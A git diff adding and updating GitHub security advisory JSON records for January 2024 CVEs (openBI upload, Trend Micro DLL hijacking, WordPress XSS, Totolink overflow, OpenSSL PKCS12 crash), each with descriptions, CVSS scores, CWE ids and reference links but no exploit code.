b/advisories/unreviewed/2024/01/GHSA-9fhq-2p6p-h9p8/GHSA-9fhq-2p6p-h9p8.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9fhq-2p6p-h9p8", + "modified": "2024-01-30T18:30:20Z", + "published": "2024-01-30T18:30:20Z", + "aliases": [ + "CVE-2024-1035" + ], + "details": "A vulnerability has been found in openBI up to 1.0.8 and classified as critical. This vulnerability affects the function uploadIcon of the file /application/index/controller/Icon.php. The manipulation of the argument image leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252310 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1035" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/AIbnbytIW9Bq" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252310" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252310" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T16:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-9fpx-vc83-vhpf/GHSA-9fpx-vc83-vhpf.json b/advisories/unreviewed/2024/01/GHSA-9fpx-vc83-vhpf/GHSA-9fpx-vc83-vhpf.json new file mode 100644 index 0000000000000..ac3beb07efdd6 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-9fpx-vc83-vhpf/GHSA-9fpx-vc83-vhpf.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9fpx-vc83-vhpf", + "modified": "2024-02-06T21:30:24Z", + "published": "2024-01-29T21:30:27Z", + "aliases": [ + "CVE-2024-23940" + ], + "details": "Trend Micro uiAirSupport, included in the Trend Micro Security 2023 family of consumer products, version 6.0.2092 and below is vulnerable to a DLL hijacking/proxying vulnerability, which if exploited could allow an attacker to impersonate and modify a library to execute code on the system and ultimately escalate privileges on an affected system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23940" + }, + { + "type": "WEB", + "url": "https://helpcenter.trendmicro.com/en-us/article/tmka-12134" + }, + { + "type": "WEB", + "url": "https://helpcenter.trendmicro.com/ja-jp/article/tmka-12132" + }, + { + "type": "WEB", + "url": "https://medium.com/@s1kr10s/av-when-a-friend-becomes-an-enemy-55f41aba42b1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-427" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T19:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-9gf5-vf62-9578/GHSA-9gf5-vf62-9578.json b/advisories/unreviewed/2024/01/GHSA-9gf5-vf62-9578/GHSA-9gf5-vf62-9578.json new file mode 100644 index 0000000000000..49720a41a6bd1 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-9gf5-vf62-9578/GHSA-9gf5-vf62-9578.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9gf5-vf62-9578", + "modified": "2024-01-31T21:31:03Z", + "published": "2024-01-31T21:31:03Z", + "aliases": [ + "CVE-2024-22153" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Fahad Mahmood & Alexandre Faustino Stock Locations for WooCommerce allows Stored XSS.This issue affects Stock Locations for WooCommerce: from n/a through 2.5.9.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22153" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/stock-locations-for-woocommerce/wordpress-stock-locations-for-woocommerce-plugin-2-5-9-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T19:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-9gjc-h498-ff34/GHSA-9gjc-h498-ff34.json b/advisories/unreviewed/2024/01/GHSA-9gjc-h498-ff34/GHSA-9gjc-h498-ff34.json index c0bea285ab02e..c9fa2e3e0be14 100644 --- a/advisories/unreviewed/2024/01/GHSA-9gjc-h498-ff34/GHSA-9gjc-h498-ff34.json +++ b/advisories/unreviewed/2024/01/GHSA-9gjc-h498-ff34/GHSA-9gjc-h498-ff34.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-9gjc-h498-ff34", - "modified": "2024-01-23T21:30:21Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T21:30:21Z", "aliases": [ "CVE-2023-52094" ], "details": "An updater link following vulnerability in the Trend Micro Apex One agent could allow a local attacker to abuse the updater to delete an arbitrary folder, leading for a local privilege escalation on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-59" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-9gmp-mjhc-r22w/GHSA-9gmp-mjhc-r22w.json b/advisories/unreviewed/2024/01/GHSA-9gmp-mjhc-r22w/GHSA-9gmp-mjhc-r22w.json new file mode 100644 index 0000000000000..e806ec1026355 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-9gmp-mjhc-r22w/GHSA-9gmp-mjhc-r22w.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9gmp-mjhc-r22w", + "modified": "2024-02-03T03:30:27Z", + "published": "2024-01-29T15:30:29Z", + "aliases": [ + "CVE-2023-5943" + ], + "details": "The Wp-Adv-Quiz WordPress plugin before 1.0.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5943" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/18fbe9d5-4829-450b-988c-8ba4becd032a/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-9gwq-8vvr-p65j/GHSA-9gwq-8vvr-p65j.json b/advisories/unreviewed/2024/01/GHSA-9gwq-8vvr-p65j/GHSA-9gwq-8vvr-p65j.json index e3833a13116d3..a3c820c0d8956 100644 --- a/advisories/unreviewed/2024/01/GHSA-9gwq-8vvr-p65j/GHSA-9gwq-8vvr-p65j.json +++ b/advisories/unreviewed/2024/01/GHSA-9gwq-8vvr-p65j/GHSA-9gwq-8vvr-p65j.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-9gwq-8vvr-p65j", - "modified": "2024-01-23T21:30:21Z", + "modified": "2024-02-01T21:30:30Z", "published": "2024-01-23T21:30:21Z", "aliases": [ "CVE-2023-51200" ], "details": "An issue in the default configurations of ROS2 Foxy Fitzroy ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows unauthenticated attackers to authenticate using default credentials.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-798" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-9h4j-w5f8-xjpc/GHSA-9h4j-w5f8-xjpc.json b/advisories/unreviewed/2024/01/GHSA-9h4j-w5f8-xjpc/GHSA-9h4j-w5f8-xjpc.json new file mode 100644 index 0000000000000..52e8395b25c79 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-9h4j-w5f8-xjpc/GHSA-9h4j-w5f8-xjpc.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9h4j-w5f8-xjpc", + "modified": "2024-01-29T15:30:30Z", + "published": "2024-01-29T15:30:30Z", + "aliases": [ + "CVE-2024-1003" + ], + "details": "A vulnerability, which was classified as critical, has been found in Totolink N200RE 9.3.5u.6139_B20201216. Affected by this issue is the function setLanguageCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument lang leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252272. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1003" + }, + { + "type": "WEB", + "url": "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setLanguageCfg-72357294db1e4f8096b29d3f2592d1fc?pvs=4" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252272" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252272" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T15:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-9m57-xv2x-rj9v/GHSA-9m57-xv2x-rj9v.json b/advisories/unreviewed/2024/01/GHSA-9m57-xv2x-rj9v/GHSA-9m57-xv2x-rj9v.json new file mode 100644 index 0000000000000..ddf3e4b74eb0e --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-9m57-xv2x-rj9v/GHSA-9m57-xv2x-rj9v.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9m57-xv2x-rj9v", + "modified": "2024-02-05T21:30:31Z", + "published": "2024-01-31T00:30:18Z", + "aliases": [ + "CVE-2024-1077" + ], + "details": "Use after free in Network in Google Chrome prior to 121.0.6167.139 allowed a remote attacker to potentially exploit heap corruption via a malicious file. (Chromium security severity: High)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1077" + }, + { + "type": "WEB", + "url": "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_30.html" + }, + { + "type": "WEB", + "url": "https://crbug.com/1511085" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NEUXJY3YC3VGIJW2AOHL4NZ7ZK7BRYWY/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XCVKRHRWPMITSVFBHQBSNXOVJAKT547Q/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T22:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-9m6f-83hx-8wwr/GHSA-9m6f-83hx-8wwr.json b/advisories/unreviewed/2024/01/GHSA-9m6f-83hx-8wwr/GHSA-9m6f-83hx-8wwr.json new file mode 100644 index 0000000000000..27264e7155dc8 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-9m6f-83hx-8wwr/GHSA-9m6f-83hx-8wwr.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9m6f-83hx-8wwr", + "modified": "2024-01-31T21:31:03Z", + "published": "2024-01-31T21:31:03Z", + "aliases": [ + "CVE-2024-1111" + ], + "details": "A vulnerability, which was classified as problematic, has been found in SourceCodester QR Code Login System 1.0. Affected by this issue is some unknown functionality of the file add-user.php. The manipulation of the argument qr-code leads to cross site scripting. The attack may be launched remotely. VDB-252470 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1111" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252470" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252470" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T19:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-9mw7-8x3h-gcqc/GHSA-9mw7-8x3h-gcqc.json b/advisories/unreviewed/2024/01/GHSA-9mw7-8x3h-gcqc/GHSA-9mw7-8x3h-gcqc.json index 61c807e1bec18..803d3936b321d 100644 --- a/advisories/unreviewed/2024/01/GHSA-9mw7-8x3h-gcqc/GHSA-9mw7-8x3h-gcqc.json +++ b/advisories/unreviewed/2024/01/GHSA-9mw7-8x3h-gcqc/GHSA-9mw7-8x3h-gcqc.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-9mw7-8x3h-gcqc", - "modified": "2024-01-16T18:31:09Z", + "modified": "2024-01-30T15:30:20Z", "published": "2024-01-16T18:31:09Z", "aliases": [ "CVE-2023-3771" ], "details": "The T1 WordPress theme through 19.0 is vulnerable to unauthenticated open redirect with which any attacker and redirect users to arbitrary websites.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-601" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-16T16:15:11Z" diff --git a/advisories/unreviewed/2024/01/GHSA-9mx6-23q4-mcch/GHSA-9mx6-23q4-mcch.json b/advisories/unreviewed/2024/01/GHSA-9mx6-23q4-mcch/GHSA-9mx6-23q4-mcch.json index af71e3edef933..989fda3cc67ab 100644 --- a/advisories/unreviewed/2024/01/GHSA-9mx6-23q4-mcch/GHSA-9mx6-23q4-mcch.json +++ b/advisories/unreviewed/2024/01/GHSA-9mx6-23q4-mcch/GHSA-9mx6-23q4-mcch.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9mx6-23q4-mcch", - "modified": "2024-01-27T00:31:23Z", + "modified": "2024-02-01T06:31:04Z", "published": "2024-01-27T00:31:23Z", "aliases": [ "CVE-2023-52187" diff --git a/advisories/unreviewed/2024/01/GHSA-9p23-87ch-pcgg/GHSA-9p23-87ch-pcgg.json b/advisories/unreviewed/2024/01/GHSA-9p23-87ch-pcgg/GHSA-9p23-87ch-pcgg.json index 85c48b8b738ae..48f5413270b94 100644 --- a/advisories/unreviewed/2024/01/GHSA-9p23-87ch-pcgg/GHSA-9p23-87ch-pcgg.json +++ b/advisories/unreviewed/2024/01/GHSA-9p23-87ch-pcgg/GHSA-9p23-87ch-pcgg.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-9p23-87ch-pcgg", - "modified": "2024-01-22T06:30:31Z", + "modified": "2024-01-29T15:30:24Z", "published": "2024-01-22T06:30:31Z", "aliases": [ "CVE-2024-22113" ], "details": "Open redirect vulnerability in Access analysis CGI An-Analyzer released in 2023 December 31 and earlier allows a remote unauthenticated attacker to redirect users to arbitrary websites and conduct phishing attacks via a specially crafted URL.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-601" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-22T05:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-9r3x-4hrp-2hgr/GHSA-9r3x-4hrp-2hgr.json b/advisories/unreviewed/2024/01/GHSA-9r3x-4hrp-2hgr/GHSA-9r3x-4hrp-2hgr.json new file mode 100644 index 0000000000000..d5156aba2cdd4 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-9r3x-4hrp-2hgr/GHSA-9r3x-4hrp-2hgr.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9r3x-4hrp-2hgr", + "modified": "2024-01-30T00:30:29Z", + "published": "2024-01-30T00:30:29Z", + "aliases": [ + "CVE-2024-1020" + ], + "details": "A vulnerability classified as problematic was found in Rebuild up to 3.5.5. Affected by this vulnerability is the function getStorageFile of the file /filex/proxy-download. The manipulation of the argument url leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252289 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1020" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252289" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252289" + }, + { + "type": "WEB", + "url": "https://www.yuque.com/mailemonyeyongjuan/tha8tr/gdd3hiwz8uo6ylab" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T22:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-9rf9-hjjr-q4r4/GHSA-9rf9-hjjr-q4r4.json b/advisories/unreviewed/2024/01/GHSA-9rf9-hjjr-q4r4/GHSA-9rf9-hjjr-q4r4.json index e04f000c42e6c..179d7cfa7e8c2 100644 --- a/advisories/unreviewed/2024/01/GHSA-9rf9-hjjr-q4r4/GHSA-9rf9-hjjr-q4r4.json +++ b/advisories/unreviewed/2024/01/GHSA-9rf9-hjjr-q4r4/GHSA-9rf9-hjjr-q4r4.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-9rf9-hjjr-q4r4", - "modified": "2024-01-25T21:32:15Z", + "modified": "2024-01-29T18:31:48Z", "published": "2024-01-25T21:32:15Z", "aliases": [ "CVE-2024-22635" ], "details": "WebCalendar v1.3.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /WebCalendarvqsmnseug2/edit_entry.php.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-25T21:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-9v9h-cgj8-h64p/GHSA-9v9h-cgj8-h64p.json b/advisories/unreviewed/2024/01/GHSA-9v9h-cgj8-h64p/GHSA-9v9h-cgj8-h64p.json index dd437a7188cbc..cc218deb602cb 100644 --- a/advisories/unreviewed/2024/01/GHSA-9v9h-cgj8-h64p/GHSA-9v9h-cgj8-h64p.json +++ b/advisories/unreviewed/2024/01/GHSA-9v9h-cgj8-h64p/GHSA-9v9h-cgj8-h64p.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-9v9h-cgj8-h64p", - "modified": "2024-01-26T09:30:23Z", + "modified": "2024-02-02T18:30:29Z", "published": "2024-01-26T09:30:23Z", "aliases": [ "CVE-2024-0727" ], "details": "Issue summary: Processing a maliciously formatted PKCS12 file may lead OpenSSL\nto crash leading to a potential Denial of Service attack\n\nImpact summary: Applications loading files in the PKCS12 format from untrusted\nsources might terminate abruptly.\n\nA file in PKCS12 format can contain certificates and keys and may come from an\nuntrusted source. The PKCS12 specification allows certain fields to be NULL, but\nOpenSSL does not correctly check for this case. This can lead to a NULL pointer\ndereference that results in OpenSSL crashing. If an application processes PKCS12\nfiles from an untrusted source using the OpenSSL APIs then that application will\nbe vulnerable to this issue.\n\nOpenSSL APIs that are vulnerable to this are: PKCS12_parse(),\nPKCS12_unpack_p7data(), PKCS12_unpack_p7encdata(), PKCS12_unpack_authsafes()\nand PKCS12_newpass().\n\nWe have also fixed a similar issue in SMIME_write_PKCS7(). However since this\nfunction is related to writing data we do not consider it security significant.\n\nThe FIPS modules in 3.2, 3.1 and 3.0 are not affected by this issue.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -47,7 +50,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-26T09:15:07Z" diff --git a/advisories/unreviewed/2024/01/GHSA-9vm4-r3mm-m2cq/GHSA-9vm4-r3mm-m2cq.json b/advisories/unreviewed/2024/01/GHSA-9vm4-r3mm-m2cq/GHSA-9vm4-r3mm-m2cq.json index b41d2b4014371..bb54442f1598a 100644 --- a/advisories/unreviewed/2024/01/GHSA-9vm4-r3mm-m2cq/GHSA-9vm4-r3mm-m2cq.json +++ b/advisories/unreviewed/2024/01/GHSA-9vm4-r3mm-m2cq/GHSA-9vm4-r3mm-m2cq.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20977" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0003/" + }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2024.html" diff --git a/advisories/unreviewed/2024/01/GHSA-9vpc-ch84-fc8h/GHSA-9vpc-ch84-fc8h.json b/advisories/unreviewed/2024/01/GHSA-9vpc-ch84-fc8h/GHSA-9vpc-ch84-fc8h.json index a228792fbbce1..66912929bd541 100644 --- a/advisories/unreviewed/2024/01/GHSA-9vpc-ch84-fc8h/GHSA-9vpc-ch84-fc8h.json +++ b/advisories/unreviewed/2024/01/GHSA-9vpc-ch84-fc8h/GHSA-9vpc-ch84-fc8h.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-9vpc-ch84-fc8h", - "modified": "2024-01-24T21:30:33Z", + "modified": "2024-02-01T18:31:07Z", "published": "2024-01-24T21:30:33Z", "aliases": [ "CVE-2021-42147" ], "details": "Buffer over-read vulnerability in the dtls_sha256_update function in Contiki-NG tinyDTLS through master branch 53a0d97 allows remote attackers to cause a denial of service via crafted data packet.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-125" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T19:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-9w3h-593p-q56r/GHSA-9w3h-593p-q56r.json b/advisories/unreviewed/2024/01/GHSA-9w3h-593p-q56r/GHSA-9w3h-593p-q56r.json new file mode 100644 index 0000000000000..f2fbf562159ef --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-9w3h-593p-q56r/GHSA-9w3h-593p-q56r.json @@ -0,0 +1,51 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9w3h-593p-q56r", + "modified": "2024-01-29T12:30:20Z", + "published": "2024-01-29T12:30:20Z", + "aliases": [ + "CVE-2023-5378" + ], + "details": "Improper Input Validation vulnerability in MegaBIP and already unsupported SmodBIP software allows for Stored XSS.This issue affects SmodBIP in all versions and MegaBIP in versions up to 4.36.2 (newer versions were not tested; the vendor has not confirmed fixing the vulnerability). \n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5378" + }, + { + "type": "WEB", + "url": "https://cert.pl/en/posts/2023/12/CVE-2023-5378" + }, + { + "type": "WEB", + "url": "https://cert.pl/posts/2023/12/CVE-2023-5378" + }, + { + "type": "WEB", + "url": "https://megabip.pl/" + }, + { + "type": "WEB", + "url": "https://smod.pl/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20", + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T12:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-9x52-pxhj-x4j7/GHSA-9x52-pxhj-x4j7.json b/advisories/unreviewed/2024/01/GHSA-9x52-pxhj-x4j7/GHSA-9x52-pxhj-x4j7.json new file mode 100644 index 0000000000000..0a2bf3b81d6ec --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-9x52-pxhj-x4j7/GHSA-9x52-pxhj-x4j7.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9x52-pxhj-x4j7", + "modified": "2024-01-29T15:30:29Z", + "published": "2024-01-29T15:30:29Z", + "aliases": [ + "CVE-2024-1015" + ], + "details": " Remote command execution vulnerability in SE-elektronic GmbH E-DDC3.3 affecting versions 03.07.03 and higher. An attacker could send different commands from the operating system to the system via the web configuration functionality of the device.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1015" + }, + { + "type": "WEB", + "url": "https://www.hackplayers.com/2024/01/cve-2024-1014-and-cve-2024-1015.html" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-se-elektronic-gmbh-products" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T14:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-9xm4-hw5v-jpjg/GHSA-9xm4-hw5v-jpjg.json b/advisories/unreviewed/2024/01/GHSA-9xm4-hw5v-jpjg/GHSA-9xm4-hw5v-jpjg.json index e6db81b7d1dbe..170026628b222 100644 --- a/advisories/unreviewed/2024/01/GHSA-9xm4-hw5v-jpjg/GHSA-9xm4-hw5v-jpjg.json +++ b/advisories/unreviewed/2024/01/GHSA-9xm4-hw5v-jpjg/GHSA-9xm4-hw5v-jpjg.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-9xm4-hw5v-jpjg", - "modified": "2024-01-23T15:30:57Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-23T15:30:57Z", "aliases": [ "CVE-2024-0744" ], "details": "In some circumstances, JIT compiled code could have dereferenced a wild pointer value. This could have led to an exploitable crash. This vulnerability affects Firefox < 122.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-119" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T14:15:38Z" diff --git a/advisories/unreviewed/2024/01/GHSA-9xv5-7pc9-8rr3/GHSA-9xv5-7pc9-8rr3.json b/advisories/unreviewed/2024/01/GHSA-9xv5-7pc9-8rr3/GHSA-9xv5-7pc9-8rr3.json new file mode 100644 index 0000000000000..80fc18f7b39c9 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-9xv5-7pc9-8rr3/GHSA-9xv5-7pc9-8rr3.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9xv5-7pc9-8rr3", + "modified": "2024-02-03T03:30:27Z", + "published": "2024-01-29T15:30:29Z", + 